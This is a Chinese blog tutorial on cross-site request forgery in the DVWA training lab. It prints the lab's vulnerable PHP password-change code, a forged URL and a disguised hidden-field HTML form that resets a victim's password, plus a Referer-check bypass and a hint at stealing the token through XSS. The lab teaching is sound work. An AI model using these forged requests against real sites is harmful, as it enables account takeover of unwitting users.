DVWA练习之CSRF

最新推荐文章于 2024-05-16 13:53:25 发布
最新推荐文章于 2024-05-16 13:53:25 发布
阅读量2.5k 收藏 14
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dz919908651/article/details/81866619
版权

DVWA练习之CSRF

本博客将记录在web安全问题中一种常见的漏洞——“CSRF”漏洞的实践演练。首先阐述CSRF漏洞的概念,原理,最后展示基于DVWA的各种等级的CSRF。

CSRF概念

CSRF(cross-site request forgery):跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。

DVWA跨站请求伪造

DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

部署好DVWA后,登陆DVWA首先选择练习的难度等级。DVWA中共分为四种安全级别:Low,Medium,High,Impossible。然后选择练习的模块,这里我们选择CSRF(跨站请求伪造)模块。

Low等级

这里写图片描述
选好等级后,进入CSRF(跨站请求伪造)模块。
这里写图片描述
发现是修改密码的界面,那么首先按照正常的流程修改密码。
这里写图片描述
页面显示密码已经改变,说明我们修改密码成功。而且url发生了改变变成了
DVWA-1.9/...../csrf/?password_new=test&password_conf=test&Change=Change#
我们查看DVWA的源代码


<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

    mysql_close(); 
} 

?>

发现代码只判断了$pass_new == $pass_conf是否成立没有其他防范CSRF的措施。
因此我们要利用以上漏洞:
(1)构造链接:将之前的url改成http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#
用户点击后密码会直接改成password(但是现在一眼就可以看出这是修改密码的操作而且点击进入后是修改密码成功的页面)
(2)构造页面:构造一个虚假的点击进入的页面。

<html>
    <body>
        <from action="http://127.0.0.1/DVWA-1.9/vulnerabilities/csrf/">
            <input type="hidden" name="password_new" value="password"/>
            <input type="hidden" name="password_conf" value="password"/>
            <input type="hidden" name="Change" value="Change"/>
            <input type="submit"  value="美女图片"/>
        </from>
    </body>
</html>

其url为http://127.0.0.1/csrftest.html点击后效果如图
这里写图片描述
而且密码成功修改,说明CSRF漏洞测试成功!

Medium等级(校验referer)

我们按照Low等级的方法发现结果如下
这里写图片描述
显示修改密码失败,说明之前的方法已经行不通了。我们查看源代码。

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Checks to see where the request came from 
    if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) ) { 
        // Get input 
        $pass_new  = $_GET[ 'password_new' ]; 
        $pass_conf = $_GET[ 'password_conf' ]; 

        // Do the passwords match? 
        if( $pass_new == $pass_conf ) { 
            // They do! 
            $pass_new = mysql_real_escape_string( $pass_new ); 
            $pass_new = md5( $pass_new ); 

            // Update the database 
            $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
            $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

            // Feedback for the user 
            echo "<pre>Password Changed.</pre>"; 
        } 
        else { 
            // Issue with passwords matching 
            echo "<pre>Passwords did not match.</pre>"; 
        } 
    } 
    else { 
        // Didn't come from a trusted source 
        echo "<pre>That request didn't look correct.</pre>"; 
    } 

    mysql_close(); 
} 

?>

其中函数eregi(pattern,string)的功能是检查string中是否含有pattern(不区分大小写),若有返回ture,若没有则返回false。
也就是说Medium等级在判断$pass_new == $pass_conf之前还检查了保留变量HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,即要访问的主机名)。
这里写图片描述
过滤规则是http包头的Referer参数的值中必须包含主机名

我们可以将攻击页面命名为127.0.0.1.html(页面被放置在攻击者的服务器里)就可以绕过了

High等级(随机Token)

查看服务器源代码

<?php 

if( isset( $_GET[ 'Change' ] ) ) { 
    // Check Anti-CSRF token 
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); 

    // Get input 
    $pass_new  = $_GET[ 'password_new' ]; 
    $pass_conf = $_GET[ 'password_conf' ]; 

    // Do the passwords match? 
    if( $pass_new == $pass_conf ) { 
        // They do! 
        $pass_new = mysql_real_escape_string( $pass_new ); 
        $pass_new = md5( $pass_new ); 

        // Update the database 
        $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; 
        $result = mysql_query( $insert ) or die( '<pre>' . mysql_error() . '</pre>' ); 

        // Feedback for the user 
        echo "<pre>Password Changed.</pre>"; 
    } 
    else { 
        // Issue with passwords matching 
        echo "<pre>Passwords did not match.</pre>"; 
    } 

    mysql_close(); 
} 

// Generate Anti-CSRF token 
generateSessionToken(); 

?>

可以看到,High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。
要绕过High级别的反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。可以利用High级别的XSS漏洞协助获取Anti-CSRF token。

Impossible等级

这里写图片描述
impossible等级页面已经发生了变化,需要用户输入当前密码才能够修改密码,简单粗暴可以完全确保当前用户是本人,从而防止了CSRF漏洞。

dz-bypp
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
pikachu,dvwacsrf详细步骤
05-17
初学者可以参考
DVWA靶场通关----(3) CSRF教程
z09364517158的博客
04-02 531
CSRF(跨站请求伪造),全称为Cross-site request forgery,简单来说,是攻击者利用受害者尚未失效的身份认证信息,诱骗受害者点击恶意链接或含有攻击代码的页面,在受害者不知情的情况下以受害者的身份像服务器发起请求,从而实现非法攻击(改密)。High级别的代码增加了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端请求。
跨站请求伪造(CSRF)漏洞简介及靶场演示
seek_2022的博客
05-10 2727
文章目录一、CSRF漏洞简介(一)什么是CSRF?(二)CSRF的原理(三)CSRF的危害二、CSRF漏洞如何挖掘?三、靶场实战(一)线上搭建环境测试(二)靶场实战四、小结 一、CSRF漏洞简介 (一)什么是CSRFCSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者"Session Riding",通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信
DVWA中的CSRF中级_dvwa csrf中级
最新发布
2301_82243523的博客
05-16 405
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。,大家跟着这个大的方向学习准没问题。
CSRF漏洞-01】跨站请求伪造漏洞靶场实战
cc
02-19 4033
跨站请求伪造(Cross-site request forgery,CSRF)是一种攻击,它强制终端用户在当前对其进行身份验证后的web应用程序上执行非本意的操作。CSRF攻击的主要目的在伪造更改状态(修改密码、转账等)的请求,而不是盗取数据,因为攻击者无法查看对伪造请求的响应。借助社工的一些帮助(例如通过电子邮件或聊天发送链接),攻击者可以诱骗用户执行攻击者选择的操作。
CSRF环境搭建及攻击测试
weixin_50341025的博客
04-15 617
一、环境搭建 1.pikachu-scrf实验模块 2.kali-apache搭建 apt-get update apt-get install apache2 service apache2 start 开启服务 php -version 应该打印出版本结果 cd /var/www/html 进入web根目录 将测试页面放入目录 3.测试网络是否可以打开 本机:http://192.168.75.1/pp/ Kali: http://192.168.75.128/csrgtest.php 二、
DVWA 靶场CSRF(low)
qq_14902381的博客
08-15 1407
dvwa靶场,csrf利用
dvwa靶场csrf(跨站请求伪造)全难度教程(附代码分析)
m0_73248913的博客
01-28 266
建议使用owaspbwa靶场可以不用搭建dvwa以及其他常用靶场,省去搭建靶场的困扰,但是此靶机靶场较老,并不建议使用owaspbwa下载地址: OWASP Broken Web Applications Project download |注:owaspbwa的本机用户名root密码owaspbwa,记得看看靶机的ip方便以后使用。dvwa的用户名和密码都为admin(owaspbwa中的dvwa是此,其他的用户名为admin密码为password)
DVWA练习平台
04-24
是一个用来进行安全脆弱性鉴定的 PHP /MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
渗透测试经典靶场学习-DVWA练习.
07-02
渗透测试经典靶场学习-DVWA练习.
Web安全之DVWA入门
03-10
web安全之dvwa入门篇书籍,小白学习中的好书籍!!!!
DVWA通关手册.docx
08-19
文档内部包含DVWA平台,所有类型漏洞低中高等级的攻击过程,非常仔细。也有部分自己的攻击方法,值得一试。
Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现
weixin_45006525的博客
04-29 1476
Webmin(CVE-2021-31760) 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现第一个CVE-2021-31760 影响范
DVWA(Web 渗透的靶机环境)+csrf漏洞练习
net的博客
03-16 2385
用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。十个攻击模块,分别是:1、Brute Force(暴力(破解))、2、Command Injection(命令行注入)、3、CSRF(跨站请求伪造)、4、- File Inclusion(文件包含)、5、File Upload(文件上传)、6、Insecure CAPTCHA (不安全的验证码)、
DVWACSRF
RexHa的博客
09-30 7101
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWA - CSRF (low, medium, high)
无节操
01-06 3391
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
CSRF攻击
weixin_42606458的博客
03-02 1226
对于常规的Web攻击手段,如XSS、CRSF、SQL注入、(常规的不包括文件上传漏洞、DDoS攻击)等,防范措施相对来说比较容易,对症下药即可,比如XSS的防范需要转义掉输入的尖括号,防止CRSF攻击需要将cookie设置为httponly,以及增加session相关的Hash token码 ,SQL注入的防范需要将分号等字符转义,等等做起来虽然筒单,但却容易被忽视,更多的是需要从开发流程上来予以...
DVWACSRF攻击(Low&medium&High)
liweibin812的博客
01-14 5111
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 4962
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
dvwa csrf
07-27
CSRF(Cross-Site Request Forgery)是一种常见的Web应用程序安全漏洞,攻击者通过利用用户在已认证的应用程序上执行未经授权的操作。DVWA(Damn Vulnerable Web Application)是一个用于练习和学习Web应用程序安全测试的虚拟环境。 在DVWA中,CSRF漏洞可以用来模拟攻击和学习防御措施。你可以使用DVWA提供的漏洞环境来了解和实践如何利用和防御CSRF攻击。 要利用DVWA中的CSRF漏洞,通常需要满足以下条件: 1. 用户必须已经在应用程序中进行过认证并保持登录状态。 2. 攻击者需要构造一个恶意网页或链接,将其发送给受害者。 3. 受害者点击了该恶意网页或链接,导致执行未经授权的操作。 为了防御CSRF攻击,可以采取以下措施: 1. 使用CSRF令牌(也称为同步令牌):在表单中包含一个生成的令牌,并在处理请求时验证该令牌。 2. 检查Referer头:在服务器端验证请求的Referer头部,确保请求来自合法的来源。 3. 添加验证码:在敏感操作(例如修改密码、删除账户等)之前,要求用户输入验证码进行验证。 需要注意的是,以上仅是一些常见的防御措施,具体的防御方法应根据应用程序的需求和特点来确定。同时,对于开发人员来说,了解和理解CSRF攻击的原理和防御方法是非常重要的,以确保应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值